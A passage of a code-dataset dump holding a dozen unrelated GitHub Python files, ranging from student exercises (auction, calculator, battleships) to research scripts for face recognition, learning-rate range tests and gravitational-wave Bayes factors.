valid_feat_t_i\n\n # print(similarity_s_i.shape)\n # print(similarity_t_i.shape)\n\n loss += ((similarity_s_i - similarity_t_i)**2).mean()\n\n loss = self.loss_weight * loss / N\n\n return loss","repo_name":"zhyever/LiteDepth","sub_path":"projects/toolbox_plugin/models/losses/similarity_mse_loss.py","file_name":"similarity_mse_loss.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"31"} +{"seq_id":"40492043433","text":"\n#HINT: You can call clear() to clear the output in the console.\nlogo = '''\n ___________\n \\ /\n )_______(\n |\"\"\"\"\"\"\"|_.-._,.---------.,_.-._\n | | | | | | ''-.\n | |_| |_ _| |_..-'\n |_______| '-' `'---------'` '-'\n )\"\"\"\"\"\"\"(\n /_________\\\\\n .-------------.\n /_______________\\\\\n'''\nprint(logo)\nbid={}\n\ndef bidding_auction(bidding):\n high_bid=0\n high_bidder=\"\"\n for bidder in bidding:\n value=bidding[bidder]\n if value>high_bid:\n high_bid=value\n high_bidder=bidder\n print(f\"the highest bidder is {high_bidder} of bid $ {high_bid}\")\n\n\n\nbidding_done=False\nwhile not bidding_done:\n name=(input(\"what's your name? \"))\n bid_amount=(float(input(\"what's your bid? \")))\n bid[name]=bid_amount\n option=input(\"Is there any other bidders left , type yes or no : \")\n if option==\"no\":\n bidding_done=True\n bidding_auction(bid)\n elif option==\"yes\":\n print(\" type :clear()\")\n\n\n","repo_name":"pinnepalliharish/Py_repo","sub_path":"python/blind_auction_pydictionories.py","file_name":"blind_auction_pydictionories.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8152325347","text":"import sys\nimport pygame\nfrom PIL import Image\nimport ttkbootstrap as ttk\n\n# 设置窗口大小\nfrom GUI.welcom_page import basedesk\n\nsize = (600, 300)\n# 修改原始图片大小为窗口大小\npic_org = Image.open('../Image/start_page.jpeg') # 把'original_bg.jpg'换成你保存的图片的路径, 下同\npic_new = pic_org.resize(size, Image.ANTIALIAS)\npic_new.save('../Image/background.jpg')\n# 导入修改尺寸后的图片\npicture = pygame.image.load('../Image/background.jpg')\n# 估计开始键的中心坐标\ncenter = (int(size[0] / 2), int(size[1] * 0.8))\n\n\n# 这个类是用来创建一个开始键矩形,放在背景图开始键那,但是没有绘制在窗口中(所以看不到),这样点击背景图上的开始键才能有反应,具体代码不用管、不用调\nclass Button:\n\n def __init__(self, ai_game, msg):\n self.screen = ai_game.screen\n self.screen_rect = self.screen.get_rect()\n self.width, self.height = int(size[1] / 6), int(size[1] / 6)\n self.button_color = (0, 255, 0)\n self.text_color = (255, 255, 255)\n self.font = pygame.font.SysFont(None, 30)\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.center = center\n self._prep_msg(msg)\n\n def _prep_msg(self, msg):\n self.msg_image = self.font.render(msg, True, self.text_color, self.button_color)\n self.msg_image_rect = self.msg_image.get_rect()\n self.msg_image_rect.center = self.rect.center\n\n def draw_button(self):\n self.screen.fill(self.button_color, self.rect)\n self.screen.blit(self.msg_image, self.msg_image_rect)\n\n\n# 游戏主程序\nclass Snake_and_Ladders:\n\n def __init__(self):\n pygame.init()\n self.screen = pygame.display.set_mode(size) # screen屏幕大小\n pygame.display.set_caption(\"SNAKE AND LADDERS\") # 游戏名显示在窗口左上角\n self.game_active = False # 初始化时,以及每轮游戏结束后,设置为“暂停”模式,要点击开始键才开始游戏\n self.play_button = Button(self, '') # 创建的开始按钮,位置就在背景图的开始键位置,但不显示\n self.bg_color = (230, 230, 230)\n\n def run_game(self):\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # 点x就关闭\n sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN: # 点开始键就进入下一个环节,这一步设置self.game_active = True,用来指示游戏开始;注意!!!每轮游戏结束后要设置self.game_active = False 否则画不出背景图\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)\n\n if not self.game_active: # 游戏没有开始的话,将背景图绘制上去\n self.screen.blit(picture, (0, 0))\n else:\n pygame.quit() # 关闭窗口\n break # 跳出循环,结束程序\n\n # 刷新界面\n pygame.display.flip()\n\n def _check_play_button(self, mouse_pos):\n if self.play_button.rect.collidepoint(mouse_pos) and not self.game_active:\n self.game_active = True\n\n\nif __name__ == \"__main__\":\n game1 = Snake_and_Ladders() # 创建一个游戏对象\n game1.run_game() # 运行游戏\n root = ttk.Window()\n basedesk(root)\n root.mainloop()\n\n","repo_name":"HaodongYu910/SS_Assignment","sub_path":"GUI/start_page.py","file_name":"start_page.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39009936824","text":"n = int(input(\"Ingrese el número de temperaturas: \"))\ntemperaturas = []\nsuma = 0\ni = 0\n\nwhile i < n:\n temperatura = float(input(f\"Ingrese la temperatura {i+1}: \"))\n temperaturas.append(temperatura)\n suma += temperatura\n i += 1\n\npromedio = suma / n\ntemperatura_maxima = max(temperaturas)\ntemperatura_minima = min(temperaturas)\n\nprint(f\"Temperatura más alta: {temperatura_maxima}\")\nprint(f\"Temperatura más baja: {temperatura_minima}\")\nprint(f\"Temperatura promedio: {promedio}\")","repo_name":"Stiven-38/ejerciciodecicloforywhile","sub_path":"taller 17 ciclo for/ciclo while/ejercicio9.py","file_name":"ejercicio9.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14427476647","text":"import os\nfrom math import ceil\nfrom flask import render_template, request, abort\n\nfrom muzicast import const\nfrom muzicast.web import playlist\n\ndef is_first_run():\n return not os.path.exists(const.CONFIG)\n\ndef render_master_page(body_page, **kwargs):\n page_data = {\n 'playlist': playlist,\n 'body_page': body_page,\n }\n\n page_data.update(kwargs)\n return render_template('master.html', **page_data)\n\ndef page_view(page, cls, template, key, per_page=5, **kw):\n \"\"\"\n Creates a paging system to allow browsing\n larger data sets.\n\n page is the current page to be shown\n cls is the ORM instance whose rows are displayed\n template is the template that is to be rendered as the main page\n key is the name the template expects the results to be as\n per_page is the number of results shown per page\n kw are keyword arguments passed on to render_master_page, useful for plugging in other things.\n \"\"\"\n if page < 1:\n return abort(400)\n query = cls.select()\n insts = query[(page-1)*per_page:page*per_page]\n\n kwargs = {\n 'current_page': page,\n 'pages' : int(ceil(query.count()*1.0/per_page)),\n key : insts\n }\n kwargs.update(kw)\n return render_master_page(template, **kwargs)\n\ndef make_pls_playlist(tracks):\n \"\"\"\n expects a list of meta.Track objects and returns\n a PLS playlist string\n \"\"\"\n url = request.environ['HTTP_HOST']\n pos = url.rfind(':' + request.environ['SERVER_PORT'])\n if pos != -1:\n url = url[:pos]\n # otherwise the host is just the host without a port,\n # which is just what we want\n return render_template('pls.txt', tracks=list(tracks), url=url, port=const.STREAM_PORT)\n","repo_name":"nikhilm/muzicast","sub_path":"muzicast/web/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13533151183","text":"from methods import buildBoardShips\r\n\r\ndirections = [\"u\",\"d\",\"l\",\"r\"]\r\n\r\ninputs = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"0\"]\r\n\r\ncheat = False\r\n\r\n\r\nclass Player:\r\n def __init__(self, playerNumber):\r\n self.playerNumber = playerNumber\r\n self.shipsBoard = buildBoardShips(boardLength)\r\n self.shotsBoard = buildBoardShips(boardLength, False)\r\n self.alive = True\r\n self.hitsLeft = 2*int(destroyerNumber) + 3*int(cruiserNumber) + 3*int(submarineNumber) + 4*int(battleshipNumber) + 5*int(carrierNumber)\r\n\r\n\r\nclass Destroyer:\r\n def __init__(self, destroyerNum):\r\n self.length = 2\r\n self.number = destroyerNum\r\n self.name = \"destroyer\"\r\n\r\nclass Cruiser:\r\n def __init__(self, cruiserNum):\r\n self.length = 3\r\n self.number = cruiserNum\r\n self.name = \"cruiser\"\r\n\r\nclass Submarine:\r\n def __init__(self, submarineNum):\r\n self.length = 3\r\n self.number = submarineNum\r\n self.name = \"submarine\"\r\n\r\nclass Battleship:\r\n def __init__(self, battleshipNum):\r\n self.length = 4\r\n self.number = battleshipNum\r\n self.name = \"battleship\"\r\n\r\nclass Carrier:\r\n def __init__(self, carrierNum):\r\n self.length = 5\r\n self.number = carrierNum\r\n self.name = \"carrier\"\r\n\r\n \r\n \r\n\r\n\r\n\r\n","repo_name":"james-tapp/battleshipsProject","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37911195649","text":"import math\nfrom tkinter import *\nroot=Tk()\nroot.title(\"Calculator\")\ne=Entry(root, width=45, borderwidth=5)\ne.grid(row=0,column=0,columnspan=3,padx=10,pady=10)\nfnum=0\ndef button_click(number):\n current=e.get()\n e.delete(0,END)\n e.insert(0,str(current)+str(number))#Concatenate the numbers\n return\ndef button_add():\n global fnum\n global math\n math=\"addition\"\n fnum=int(e.get())\n e.delete(0,END)\ndef button_substract():\n global fnum\n global math\n math=\"substract\"\n fnum=int(e.get())\n e.delete(0,END)\ndef button_multiply():\n global fnum\n global math\n math=\"multiplication\"\n fnum=int(e.get())\n e.delete(0,END)\ndef button_divide():\n global fnum\n global math\n math=\"divition\"\n fnum=int(e.get())\n e.delete(0,END)\ndef button_equal():\n snum=e.get()\n e.delete(0,END)\n\n if math==\"addition\":\n e.insert(0,fnum+int(snum))\n if math==\"substraction\":\n e.insert(0,fnum-int(snum))\n if math==\"multiplication\":\n e.insert(0,fnum*int(snum))\n if math==\"divition\":\n e.insert(0,fnum/int(snum))\n\n \ndef button_clear():\n e.delete(0,END)\n\nbutton_1=Button(root,text=\"1\",padx=40,pady=20,command=lambda: button_click(1)) #Lambda allows to put parenthesis\nbutton_2=Button(root,text=\"2\",padx=40,pady=20,command=lambda: button_click(2))\nbutton_3=Button(root,text=\"3\",padx=40,pady=20,command=lambda: button_click(3))\nbutton_4=Button(root,text=\"4\",padx=40,pady=20,command=lambda: button_click(4))\nbutton_5=Button(root,text=\"5\",padx=40,pady=20,command=lambda: button_click(5))\nbutton_6=Button(root,text=\"6\",padx=40,pady=20,command=lambda: button_click(6))\nbutton_7=Button(root,text=\"7\",padx=40,pady=20,command=lambda: button_click(7))\nbutton_8=Button(root,text=\"8\",padx=40,pady=20,command=lambda: button_click(8))\nbutton_9=Button(root,text=\"9\",padx=40,pady=20,command=lambda: button_click(9))\nbutton_0=Button(root,text=\"0\",padx=40,pady=20,command=lambda: button_click(0))\n\nbutton_add=Button(root,text=\"+\",padx=39,pady=20,command=button_add)\nbutton_substract=Button(root,text=\"-\",padx=41,pady=20,command=button_substract)\nbutton_multiply=Button(root,text=\"*\",padx=40,pady=20,command=button_multiply)\nbutton_divide=Button(root,text=\"/\",padx=41,pady=20,command=button_divide)\nbutton_equal=Button(root,text=\"=\",padx=89,pady=20,command= button_equal)\nbutton_clear=Button(root,text=\"Clear\",padx=79,pady=20,command=button_clear)\n#Put the buttons on the screen\n\nbutton_1.grid(row=3,column=0)\nbutton_2.grid(row=3,column=1)\nbutton_3.grid(row=3,column=2)\n\nbutton_4.grid(row=2,column=0)\nbutton_5.grid(row=2,column=1)\nbutton_6.grid(row=2,column=2)\n\nbutton_7.grid(row=1,column=0)\nbutton_8.grid(row=1,column=1)\nbutton_9.grid(row=1,column=2)\n\nbutton_0.grid(row=4,column=0)\nbutton_clear.grid(row=4,column=1,columnspan=2)\nbutton_add.grid(row=5,column=0)\nbutton_equal.grid(row=5,column=1,columnspan=2)\n\nbutton_substract.grid(row=6,column=0)\nbutton_multiply.grid(row=6,column=1)\nbutton_divide.grid(row=6,column=2)\n#Run Programa\nroot.mainloop()","repo_name":"ViejoJuli/Python","sub_path":"Graphic Users Interface/Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11568213782","text":"# ***********************************************************************\n# Import libraries\n# ***********************************************************************\n\nimport os\nimport sys\nimport dill\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n \nsys.path.append( os.path.abspath( '../' ) )\n\nfrom mod.mfdMod import MfdMod\n\n# ***********************************************************************\n# Set input parameters\n# ***********************************************************************\n\nxType = 'nTrnDays'\nyType = 'error'\nxlog = False\n\npltList = [ { 'model' : '2017-07-23', 'nTrnDays' : None, 'tol' : '0.01', 'regCoef' : '0.001', 'atnFct' :'1.0' },\n { 'model' : '2018-03-10', 'nTrnDays' : None, 'tol' : '0.01', 'regCoef' : '0.001', 'atnFct' :'1.0' },\n { 'model' : '2019-05-06', 'nTrnDays' : None, 'tol' : '0.01', 'regCoef' : '0.001', 'atnFct' :'1.0' } ]\n\nlegList = [ '2017-07-23', '2018-03-10', '2019-05-06' ]\n \nmodDir = 'models_sensitivity_long_term'\n\nfigName = 'nTrnYears-sensitivity-error-logn-term.png'\n\ntitle = 'tol = 0.01; regCoef = 0.001'\n\n# ***********************************************************************\n# Sanity checks + Set some parameters\n# ***********************************************************************\n\nassert len( pltList ) == len( legList ), 'Inconsistent size!'\n\nif xType == 'tol':\n xLabel = 'Optimization Tolerance'\nelif xType == 'nTrnDays':\n xLabel = 'Num. Training Days'\nelif xType == 'regCoef':\n xLabel = 'Regularization Coef.'\nelif xType == 'atnFct':\n xLabel = 'Attenuation Factor' \nelse:\n assert False, 'Unkown xType!'\n \nif yType == 'error':\n yLabel = 'In-Sample Relative Error'\nelif yType == 'oos_error':\n yLabel = 'Out-of-Sample Relative Error'\nelif yType == 'trend_cnt':\n yLabel = 'Out-of-Sample Trend Match Count'\nelse:\n assert False, 'Unkown yType!'\n\n# ***********************************************************************\n# Some utility functions\n# ***********************************************************************\n\ndef procFileName( baseName ):\n\n tmpList = baseName.split( '_' )\n \n if tmpList[0] != 'model' or\\\n tmpList[2] != 'nTrnDays' or\\\n tmpList[4] != 'tol' or\\\n tmpList[6] != 'regCoef' or\\\n tmpList[8] != 'atnFct':\n return None\n\n tmpDict = {}\n\n for i in range( 0, len( tmpList ), 2 ):\n tmpDict[ tmpList[i] ] = tmpList[i+1]\n\n return tmpDict\n\n# ***********************************************************************\n# plot\n# ***********************************************************************\n\nfor k in range( len( pltList ) ):\n item = pltList[k]\n xVals = []\n yVals = []\n for fileName in os.listdir( modDir ):\n tmpList = os.path.splitext( fileName )\n \n if tmpList[1] != '.dill':\n continue\n\n baseName = tmpList[0]\n \n tmpDict = procFileName( baseName ) \n\n tmpFlag = True\n for tmp in tmpDict:\n \n if tmp == xType:\n continue\n \n if tmpDict[ tmp ] != item[ tmp ]:\n tmpFlag = False\n break\n \n if not tmpFlag:\n continue\n\n modFile = os.path.join( modDir, fileName )\n mfdMod = dill.load( open( modFile, 'rb' ) )\n ecoMfd = mfdMod.ecoMfd\n\n try:\n tmp = ecoMfd.atnCoefs\n except:\n ecoMfd.atnCoefs = np.ones( shape = ( ecoMfd.nTimes ) )\n \n if yType == 'error':\n yVal = ecoMfd.getError()\n elif yType == 'oos_error':\n yVal = ecoMfd.getOosError()\n elif yType == 'trend_cnt':\n yVal = ecoMfd.getOosTrendCnt()\n else:\n assert False, 'Unkown yType!'\n\n yVals.append( yVal )\n xVals.append( tmpDict[ xType ] )\n\n xVals = np.array( xVals, dtype = 'd' )\n yVals = np.array( yVals, dtype = 'd' )\n\n sortDict = {}\n for j in range( len( xVals ) ):\n sortDict[ yVals[j] ] = xVals[j] \n\n xVals = sorted( xVals )\n yVals = sorted( yVals, key = lambda y : sortDict[y] )\n\n if xlog:\n plt.semilogx( xVals, yVals, 'o-' )\n else:\n plt.plot( xVals, yVals, 'o-' )\n\nplt.title( title )\nplt.legend( legList )\nplt.xlabel( xLabel )\nplt.ylabel( yLabel )\nplt.savefig( figName )\nplt.show()\n","repo_name":"babakopti/opti-trade","sub_path":"scripts/sensitivity_plotter.py","file_name":"sensitivity_plotter.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6201007421","text":"\"\"\"\n@author: dvdm\n\"\"\"\n\n# import the necessary packages\nfrom sklearn.datasets.base import Bunch\nfrom sklearn.datasets import fetch_lfw_people, fetch_olivetti_faces\n\nfrom scipy import io\nimport numpy as np\nimport cv2\nimport copy\n\n# limit the samples to max number of targets (to limit computation times)\ndef limit_samples(faces_in, max_targets):\n faces_out = copy.deepcopy(faces_in)\n if max_targets is not None:\n n_samples = faces_in.images.shape[0]\n targets = faces_in.target\n labels = np.unique(targets)\n n_targets = labels.shape[0]\n face_ids = np.random.randint(n_targets, size=min(n_targets, max_targets))\n sample_ids = [sample_id for sample_id in range(n_samples) if targets[sample_id] in labels[face_ids]]\n faces_out.data = faces_in.data[sample_ids,]\n faces_out.images = faces_in.images[sample_ids,]\n faces_out.target = faces_in.target[sample_ids,]\n return faces_out\n\ndef load_caltech_people(datasetPath, min_faces=10, face_size=(47, 62)):\n# load the CALTECH faces dataset\n# this includes: reading the raw data; reading bounding box data; extracting faces and resizing, flattening;\n# checking on balance (minimal nr of faces/individual, equal number)\n \n # grab in all the subdirs all the image paths associated with the faces\n imagePaths = datasetPath.rglob(\"*.jpg\")\n \n # then load the bounding box data stored in a Matlab .mat file\n bbData = io.loadmat(datasetPath.joinpath(\"ImageData.mat\"))\n bbData = bbData[\"SubDir_Data\"].T\n\n # set the random seed, then initialize the data matrix and labels\n images = []\n data = []\n labels = []\n\n # loop over the image paths\n for imagePath in imagePaths:\n # load the image and convert it to grayscale\n image = cv2.imread(str(imagePath))\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # grab the bounding box associated with the current image, extract the face\n # ROI, and resize it to a canonical size\n imagePathStem = str(imagePath.stem)\n k = int(imagePathStem[imagePathStem.rfind(\"_\") + 1:][:4]) - 1\n (xBL, yBL, xTL, yTL, xTR, yTR, xBR, yBR) = bbData[k].astype(\"int\")\n face = gray[yTL:yBR, xTL:xBR]\n face = cv2.resize(face, face_size)\n\n # update the data matrix and associated labels\n images.append(face)\n face_flatten = face.flatten()\n data.append(face_flatten)\n labels.append(imagePath.parent.name)\n\n # convert the data matrix and labels list to a NumPy array\n images = np.array(images)\n data = np.array(data)\n labels = np.array(labels)\n \n return Bunch(data=data, images=images, target=labels)\n \ndef load_lfw_faces(dataset, min_faces, max_persons):\n lfw_people = fetch_lfw_people(min_faces_per_person=min_faces, resize=0.4)\n return limit_samples(lfw_people, max_persons)\n \ndef load_ATT_faces(dataset, min_faces, max_persons):\n att_faces = fetch_olivetti_faces()\n return limit_samples(att_faces, max_persons)\n\ndef load_caltech_faces(dataset, min_faces, max_persons):\n caltech_people = load_caltech_people(datasetPath=dataset, min_faces=min_faces, face_size=(47, 62))\n return limit_samples(caltech_people, max_persons)\n \ndef load_faces(facesDB, dataset, min_faces=10, max_targets=20):\n loader = {\n \"ATT\": load_ATT_faces,\n \"CALTECH\": load_caltech_faces,\n \"LFW\": load_lfw_faces\n }\n return loader[facesDB](dataset, min_faces, max_targets)","repo_name":"ivonajdenkoska/face-recognition-algorithms","sub_path":"src/localmodules/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"960163895","text":"#!/usr/bin/env python3\nimport cv2\nimport numpy\nimport sys\nimport cgi\n\ninput_data = cgi.FieldStorage()\n\nstdin = sys.stdin.buffer.read()\nbuffer = numpy.frombuffer(stdin, dtype='uint8')\nimg = cv2.imdecode(buffer, cv2.IMREAD_UNCHANGED)\n\nrow, col, channels = img.shape\n\nif channels == 3:\n\timg = cv2.cvtColor(img, cv2.COLOR_BGR2BGRA)\n\n\ndef hex_to_bgra(value):\n\t\"\"\"Return [blue, green, red, alpha] for the color given as [#]rrggbb[aa].\"\"\"\n\tvalue = value.lstrip('#')\n\tlv = len(value)\n\tif lv != 6 and lv != 8:\n\t\tvalue = \"000000\"\n\tret = [int(value[4:6], 16), int(value[2:4], 16), int(value[0:2], 16)]\n\tif len(value) == 8:\n\t\tret.append(int(value[6:8], 16))\n\telse:\n\t\tret.append(255)\n\treturn ret\n\n\ndef get_optimal_font_scale(text, width, height, font, thickness):\n\tfor scale in reversed(range(0, 60, 1)):\n\t\ttextSize = cv2.getTextSize(text, fontFace=font, fontScale=scale/10, thickness=thickness)\n\t\tnew_width = textSize[0][0]\n\t\tnew_height = textSize[0][1]\n\t\tif (new_width <= width and new_height <= height):\n\t\t\treturn scale/10\n\treturn 1\n\n\n#make a postcard out of the piped image\nif \"style\" in input_data:\n\tstyles = input_data.getlist(\"style\")\n\tif \"postcard\" in styles:\n\t\tbordercolor = hex_to_bgra(input_data.getvalue(\"border-color\") or \"#89cff0\")\n\t\tbackground = hex_to_bgra(input_data.getvalue(\"background-color\") or \"#ffffff\")\n\n\t\tbordersize = 30\n\t\timg = cv2.copyMakeBorder(\n\t\t\timg,\n\t\t\ttop=bordersize,\n\t\t\tbottom=bordersize,\n\t\t\tleft=bordersize,\n\t\t\tright=bordersize,\n\t\t\tborderType=cv2.BORDER_CONSTANT,\n\t\t\tvalue=background\n\t\t)\n\t\tbordersize = 15\n\t\timg = cv2.copyMakeBorder(\n\t\t\timg,\n\t\t\ttop=bordersize,\n\t\t\tbottom=bordersize,\n\t\t\tleft=bordersize,\n\t\t\tright=bordersize,\n\t\t\tborderType=cv2.BORDER_CONSTANT,\n\t\t\tvalue=bordercolor\n\t\t)\n\t\tbordersize = 30\n\t\timg = cv2.copyMakeBorder(\n\t\t\timg,\n\t\t\ttop=bordersize,\n\t\t\tbottom=bordersize,\n\t\t\tleft=bordersize,\n\t\t\tright=bordersize,\n\t\t\tborderType=cv2.BORDER_CONSTANT,\n\t\t\tvalue=background\n\t\t)\n\n\tif \"banner\" in styles:\n\t\tbackground = hex_to_bgra(\"#000000\")\n\t\tbannerheight = 30\n\t\timg = cv2.copyMakeBorder(\n\t\t\timg,\n\t\t\ttop=0,\n\t\t\tleft=0,\n\t\t\tright=0,\n\t\t\tbottom=bannerheight,\n\t\t\tborderType=cv2.BORDER_CONSTANT,\n\t\t\tvalue=background\n\t\t)\n\n\t\tendwidth = col + (150 if \"postcard\" in styles else 0)\n\t\tfont = cv2.FONT_ITALIC\n\t\tmessage = \"Project webserv banner!\"\n\t\tthickness = 2\n\t\tscale = get_optimal_font_scale(message, endwidth, bannerheight - 10, font, thickness)\n\t\ttextSize = cv2.getTextSize(message, fontFace=font, fontScale=scale, thickness=thickness)[0]\n\t\timg = cv2.putText(img, message,\n\t\t\t((endwidth // 2) - (textSize[0] // 2), row + bannerheight - 5 + (150 if \"postcard\" in styles else 0)),\n\t\t\tfont,\n\t\t\tscale,\n\t\t\thex_to_bgra(\"#FFFFFF\"),\n\t\t\tthickness,\n\t\t\tcv2.LINE_AA)\n\ncv2.imwrite(\"./test.png\", img)\n","repo_name":"MrCrackerplays/webserv","sub_path":"cgi/image-upload.py","file_name":"image-upload.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"69863458650","text":"# Program to test how long it takes to time.sleep(30) seconds and for loop time.sleep(1) second 30 times\n\nimport time\n\ncounter = 1\n\n# Figure out execution time of 1 loop of a time.sleep() counter\nbegin_time = time.time()\nfor i in range(2):\n print(round((time.time() + counter) - time.time()))\n time.sleep(1)\n counter += 1\nend_time = time.time() - 2\n\nprint(round(end_time - begin_time, 8))\n# Hypothesis: To loop correctly 1second everytime, subtract calculated execution time above from 1 second when calling time.sleep() because\n# actual execution time + (1 second - calculated execution time) should equal 1 second\n# 8-16 Update: sleep method at 0 had 0 execution time, by setting to 1 execution time was discovered and hypothesis seems to be correct.\ncounter = 1\n\nfor i in range(30):\n print(round((time.time() + counter) - time.time()))\n time.sleep(1 - (end_time - begin_time)/2)\n counter += 1\n","repo_name":"charichard09/ATBS-projects","sub_path":"countEverySecond.py","file_name":"countEverySecond.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40134184580","text":"import matplotlib.pyplot as plt\nimport torch\nfrom .lr_finder import LRFinder, TrainDataLoaderIter\n\n\ndef main(state, event):\n train_loader = event.dataloader(subset=\"train\", use_cache=False, deterministic=True)\n state[\"model\"] = event.init_net()\n state[\"model\"] = event.optional.to_device(state[\"model\"], altfn=lambda m: m)\n state[\"model\"] = event.optional.data_parallel(state[\"model\"], altfn=lambda m: m)\n model_name = state[\"model\"].__class__.__name__\n state[\"criterion\"] = torch.nn.CrossEntropyLoss()\n state[\"criterion\"] = event.optional.to_device(state[\"criterion\"], altfn=lambda c: c)\n criterion_name = state[\"criterion\"].__class__.__name__\n state[\"optimizer\"] = event.init_optimizer(state[\"model\"])\n optimizer_name = state[\"optimizer\"].__class__.__name__\n event.optional.before_training()\n\n class TrainIter(TrainDataLoaderIter):\n def inputs_labels_from_batch(self, batch_data):\n return batch_data[\"SOURCE\"], torch.squeeze(\n torch.squeeze(batch_data[\"TARGET\"], -3), -3\n )\n\n train_data_iter = TrainIter(train_loader)\n lrf = LRFinder(state[\"model\"], state[\"optimizer\"], state[\"criterion\"])\n lrf.range_test(\n train_data_iter,\n end_lr=state[\"end_lr\"],\n num_iter=state[\"num_iter\"],\n smooth_f=0.05,\n diverge_th=150,\n )\n fig, (ax1, ax2) = plt.subplots(ncols=2, sharey=\"row\", figsize=(10, 5), dpi=300)\n fig.suptitle(\n f\"LRRT {optimizer_name} {criterion_name} {model_name}(w{state['binary.window_size']}c{state['channel_bottleneck_depth']}lt{state['LINET.lead_time']}sr{state['search_region_radius_px']})\"\n )\n _, suggested_lr = lrf.plot(ax=ax1)\n ax1.set_title(\"Overview\")\n lrf.reset()\n lrf.range_test(\n train_data_iter,\n start_lr=suggested_lr,\n end_lr=state[\"end_lr\"],\n num_iter=state[\"num_iter\"],\n smooth_f=0.0,\n diverge_th=150,\n )\n lrf.plot(\n skip_start=0, skip_end=0, suggest_lr=False, ax=ax2\n ) # to inspect the loss-learning rate graph\n ax2.set_title(\"Detail\")\n fig.savefig(\n f\"LRRT-{optimizer_name}-{criterion_name}-{model_name}-w{state['binary.window_size']}-c{state['channel_bottleneck_depth']}-lt{state['LINET.lead_time']}-sr{state['search_region_radius_px']}.{state['image_format']}\"\n )\n lrf.reset()\n\n\ndef register(mf):\n mf.set_scope(\"main\")\n mf.register_defaults(\n {\n \"end_lr\": 100,\n \"num_iter\": 256,\n \"image_format\": \"png\",\n }\n )\n mf.register_event(\"main\", main, unique=True)\n mf.register_event(\"LRFinder\", LRFinder, unique=True)\n","repo_name":"sbrodehl/remotesensing-14-03760","sub_path":"src/events/LRRT/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"6386561011","text":"from GWXtreme import eos_model_selection as ems\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json\nimport glob\n\ndef singleEventBFs(log=False):\n # Makes barplot of BFs for a single simulation comparing that of uP(LTs) and\n # uP(Ls) (with errorbars!).\n\n uLTs_Dir = \"../bilby_runs/3dkde_studies/outdir/2nd_Phenom_Taylor/uniformP_LTs/IMRPhenomPv2_NRTidal/APR4_EPP\"\n uLs_Dir = \"../bilby_runs/3dkde_studies/outdir/2nd_Phenom_Taylor/uniformP_Ls/IMRPhenomPv2_NRTidal/APR4_EPP\"\n #injections = [\"282_1.58_1.37\", \"202_1.35_1.14\", \"179_1.35_1.23\", \"71_1.37_1.33\", \"122_1.77_1.19\", \n # \"241_1.31_1.28\", \"220_1.36_1.24\", \"282_1.35_1.32\", \"149_1.35_1.23\", \"237_1.36_1.26\", \n # \"138_1.5_1.21\", \"235_1.4_1.3\", \"219_1.3_1.28\", \"260_1.48_1.33\", \"164_1.34_1.19\", \n # \"55_1.38_1.33\", \"78_1.35_1.32\"]\n injections = [\"55_1.54_1.41\", \"65_1.36_1.17\"]\n filenameEnd = \"bns_example_result.json\"\n for injection in injections:\n print(injection)\n uLTs_File = \"{}/{}/{}\".format(uLTs_Dir,injection,filenameEnd)\n uLs_File = \"{}/{}/{}\".format(uLs_Dir,injection,filenameEnd)\n\n modsel_uLTs = ems.Model_selection(uLTs_File,Ns=4000,kdedim=2)\n modsel_uLs = ems.Model_selection(uLs_File,Ns=4000,kdedim=3)\n\n labels = [\"UniformP (dL~,L~)\", \"UniformP (L1,L2)\"]\n colors = [\"#66c2a5\",\"#fc8d62\"]\n methods = [modsel_uLTs, modsel_uLs]\n eosList = [\"BHF_BBB2\",\"KDE0V\",\"SKOP\",\"H4\",\"HQC18\",\"SKMP\",\"APR4_EPP\",\"MPA1\",\"MS1_PP\",\"MS1B_PP\"]\n methods_BFs = []\n methods_uncerts = []\n for method in methods:\n print(method)\n BFs = []\n uncerts = []\n for eos in eosList:\n print(eos)\n bf, bf_trials = method.computeEvidenceRatio(EoS1=eos,EoS2=\"SLY\",trials=1000)\n #bf = method.computeEvidenceRatio(EoS1=eos,EoS2=\"SLY\",trials=0)\n uncert = np.std(bf_trials) * 2\n BFs.append(bf)\n uncerts.append(uncert)\n methods_BFs.append(BFs)\n methods_uncerts.append(uncerts)\n\n x_axis = np.arange(len(eosList))\n spacing = 